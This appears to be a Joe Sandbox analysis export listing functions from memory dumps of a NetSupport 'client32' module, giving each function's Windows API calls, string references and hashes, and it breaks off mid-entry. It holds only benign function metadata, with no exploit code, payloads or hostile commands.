Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessageWindow$FindPost$ClassNameSendSleepThread
String ID: ..\CTL32\ipc.cpp$m_cds.cbData < m_pSharedHeader->dwDataLen - sizeof(IPCData)
API String ID: 3524374798-1411620790
Opcode ID: 42afa5bf68388e51984fb1ef34060e243bf26129c8e46c14fef31d973cacd0a3
Instruction ID: f7862f93581c5bca8d7b47be27161d917c1b37376ee9b6c345dd63ee61fb1edc
Opcode Fuzzy Hash: 42afa5bf68388e51984fb1ef34060e243bf26129c8e46c14fef31d973cacd0a3
Instruction Fuzzy Hash: 0121737574060AEFD314CF59D990D6BF3E9FB88324B10852AE55A87A40D730FC50DB50

Function 11033B30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 11033B3E
_strncpy.LIBCMT ref: 11033B4D
wsprintfA.USER32 ref: 11033BB4
_strncpy.LIBCMT ref: 11033C05

Strings

%s (%s), xrefs: 11033BAE

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strncpy$wsprintf
String ID: %s (%s)
API String ID: 2895084632-1363028141
Opcode ID: 18f0858c4a5303068056314bf920fc10920e26a65eee994cfc0761c6d3c8ec0a
Instruction ID: 0ad2666efbab1ef8cbc868768b6c2378956e4de7a80f96389552179b7afbf64e
Opcode Fuzzy Hash: 18f0858c4a5303068056314bf920fc10920e26a65eee994cfc0761c6d3c8ec0a
Instruction Fuzzy Hash: D731AF76900B02AFC324DF65C890EA3B7A9FF88318B04455DE64A8BE40E775F464CB90

Function 111438D0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetProfileStringA.KERNEL32(Windows,Device,,,LPT1:,?,00000080), ref: 111438FE
_memmove.LIBCMT ref: 1114394D

Strings

,,LPT1:, xrefs: 111438EF
Device, xrefs: 111438F4
Windows, xrefs: 111438F9

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ProfileString_memmove
String ID: ,,LPT1:$Device$Windows
API String ID: 1665476579-2967085602
Opcode ID: 84c6e57cbd8fc4f7538afa223db3259dff3af144902b2b86f036842710f49a9f
Instruction ID: 055e85ea75ba770a70e20350d0a84ef6a9c3bf4bb9e235a47bfd0f5fb1665b7d
Opcode Fuzzy Hash: 84c6e57cbd8fc4f7538afa223db3259dff3af144902b2b86f036842710f49a9f
Instruction Fuzzy Hash: E0113B39918267AADB119F70ED41BF9FB68EF55708F1000A8DD8597242FB326609C7B2

Function 110BD470 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 110BD4A4
GetSubMenu.USER32(00000000,00000002), ref: 110BD4E5
DrawMenuBar.USER32(?), ref: 110BD50D

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 110BD493
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110BD48E

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$DrawErrorExitLastMessageProcesswsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 381722633-2830328467
Opcode ID: 0cf4c9e9231e7294a34ea0469e29db66948a84948ca199a1ba082523d671b7b5
Instruction ID: 2ed85e2a360b3d02c99ae53d45e4f65cdbccb9b7267b746ab424cefae630bdcb
Opcode Fuzzy Hash: 0cf4c9e9231e7294a34ea0469e29db66948a84948ca199a1ba082523d671b7b5
Instruction Fuzzy Hash: 9B1151BAE00219AFCB04DFA5C894CAFF7B9BF49308B00457EE11697254DB74AD05CB94

Function 111479B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON

Download Yara Rule

APIs

LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 111479DF
wsprintfA.USER32 ref: 11147A16

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

i < _tsizeof (buf), xrefs: 11147A30
..\ctl32\util.cpp, xrefs: 11147A2B
#%d, xrefs: 11147A10

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$ErrorExitLastLoadMessageProcessString
String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
API String ID: 1985783259-2296142801
Opcode ID: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
Instruction ID: f4f04ea69c0c381d0959b313e9907706ba85fe26c30e15a9a088fcfc7c116df7
Opcode Fuzzy Hash: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
Instruction Fuzzy Hash: 6811E5FAE00218A7D710DEA49D81FEAF36C9B44608F100165FB08F6141EB70AA05CBE4

Function 1112DDD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 1112DDF6

Part of subcall function 1115E600: IsWindow.USER32(?), ref: 1115E612
Part of subcall function 1115E600: PostMessageA.USER32(?,00000500,1112DE1F,00000000), ref: 1115E63B

IsWindow.USER32(00000000), ref: 1112DE44
_memset.LIBCMT ref: 1112DE5A

Strings

m, xrefs: 1112DE6A
8zi, xrefs: 1112DE5F

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$CountMessagePostTick_memset
String ID: 8zi$m
API String ID: 584563138-3592177742
Opcode ID: bcb3edf5c218b899fa6183989a1341d7eced729f0605506308480f543bd28c97
Instruction ID: 0166cee24eebcb821af20421cbd360ba065f33f85c85ef7f19a59cfdbc7ebc11
Opcode Fuzzy Hash: bcb3edf5c218b899fa6183989a1341d7eced729f0605506308480f543bd28c97
Instruction Fuzzy Hash: 36119474A4022EDFDB44DFE0C9E4BADFBB4AB1570CF904128D5158B188EB719458CB51

Function 1102D750 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,1113A2AB,00000001,00000001,Audio,HookDirectSound,00000000,00000000), ref: 1102D75C
InterlockedIncrement.KERNEL32(111EE418), ref: 1102D799
InterlockedDecrement.KERNEL32(111EE418), ref: 1102D7C0

Strings

SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum, xrefs: 1102D7A6, 1102D7CC
EnableAudioHook(%d, %d), gCount=%d, xrefs: 1102D77F

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Interlocked$DecrementIncrementVersion
String ID: EnableAudioHook(%d, %d), gCount=%d$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum
API String ID: 1284810544-229394064
Opcode ID: ed1b30b65b112ff729f45d41a2fa59a58c75ec00914924fbbfd8ac9e4736dc3f
Instruction ID: 926408d456050aac1ce0bfa7cc5ec849c80561d93592d3bffa921dc6a50aec96
Opcode Fuzzy Hash: ed1b30b65b112ff729f45d41a2fa59a58c75ec00914924fbbfd8ac9e4736dc3f
Instruction Fuzzy Hash: 8801DB3AE425A956E70299D56C84F9DB7E9BF8162DFC00071FD2DD2A04F725A84043F1

Function 11093410 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registrywindowCOMMON

Download Yara Rule

APIs

GetClassInfoA.USER32(1109350C,NSMClassList,?), ref: 11093424
LoadIconA.USER32(1109350C,00002716), ref: 11093456
LoadCursorA.USER32(00000000,00007F00), ref: 11093465
RegisterClassA.USER32(?), ref: 11093483

Strings

NSMClassList, xrefs: 1109341E, 1109347C

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ClassLoad$CursorIconInfoRegister
String ID: NSMClassList
API String ID: 2883182437-2474587545
Opcode ID: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
Instruction ID: fe778f9fdd97d031227fa6c3481e124fd7af1bb38caa6574b8637058aa02c9a3
Opcode Fuzzy Hash: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
Instruction Fuzzy Hash: D2015AB1D4522DABCB00CF9A99489EEFBFCEF98315F00415BE424F3240D7B556518BA5

Function 11145660 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

LoadStringA.USER32(00000000,00000000,?,11112FE6), ref: 11145678
wsprintfA.USER32 ref: 1114568E

Strings

..\ctl32\util.cpp, xrefs: 111456A0
#%d, xrefs: 11145688
i < cchBuf, xrefs: 111456A5

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LoadStringwsprintf
String ID: #%d$..\ctl32\util.cpp$i < cchBuf
API String ID: 104907563-3240211118
Opcode ID: 188e66dcb4f495cccd276ddbe85c9828130f8f7e32c029e7730bc87656a10fbf
Instruction ID: 8140d2e7eee7513769b3ba4dad54de8c0dbe44583bb89c450ccda0d540df1705
Opcode Fuzzy Hash: 188e66dcb4f495cccd276ddbe85c9828130f8f7e32c029e7730bc87656a10fbf
Instruction Fuzzy Hash: 09F0F6BAA002267BDA008A99EC85DDFFB5CDF4469C7404025F908C7600EA30E800C7A9

Function 11145450 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,11037F05), ref: 11145463
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11145475
FreeLibrary.KERNEL32(00000000,?,11037F05), ref: 11145485

Strings

kernel32.dll, xrefs: 1114545C
GetUserDefaultUILanguage, xrefs: 1114546F

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetUserDefaultUILanguage$kernel32.dll
API String ID: 145871493-545709139
Opcode ID: d9714682fd572e4dd61365fd2dfa7814b888b2e8bab1e0a3a5dbf5644fcdd9a2
Instruction ID: e6235b5ae6f1dfca5c3043155b5dfa22c054f7606e96d7ad1ec578fde494cc77
Opcode Fuzzy Hash: d9714682fd572e4dd61365fd2dfa7814b888b2e8bab1e0a3a5dbf5644fcdd9a2
Instruction Fuzzy Hash: A1F0A7317021744FE3568AB69F84AAEFAD5EB81B7AB190135E430CAA98E73488408765

Function 110BDB80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(00000000), ref: 110BDBA5
GetSubMenu.USER32(00000000,00000002), ref: 110BDBBD
DrawMenuBar.USER32(00000000), ref: 110BDBD1

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 110BDB94
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110BDB8F

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$DrawErrorExitLastMessageProcesswsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 381722633-2830328467
Opcode ID: 7793b4124eab6fba1871c3bc9272eb7fe89a90c363d1f3ab0ff0b90efc26d385
Instruction ID: 3e24fc11817a54fd320548bffb7fb36e34be41f0dee8520d909056115beef515
Opcode Fuzzy Hash: 7793b4124eab6fba1871c3bc9272eb7fe89a90c363d1f3ab0ff0b90efc26d385
Instruction Fuzzy Hash: 34F02779A10324ABC724DB309C49F5EB2E4AB4871CF00083DF122A2580DB74A4048359

Function 110ED0D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 110ED0D9
SendMessageA.USER32(00000000,0000045B,11020C43,00000000), ref: 110ED10D
SendMessageA.USER32(00000000,00000445,00000000,04000000), ref: 110ED11C

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

IsWindow(hRich), xrefs: 110ED0ED
..\CTL32\NSWin32.cpp, xrefs: 110ED0E8

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$Send$ErrorExitLastProcessWindowwsprintf
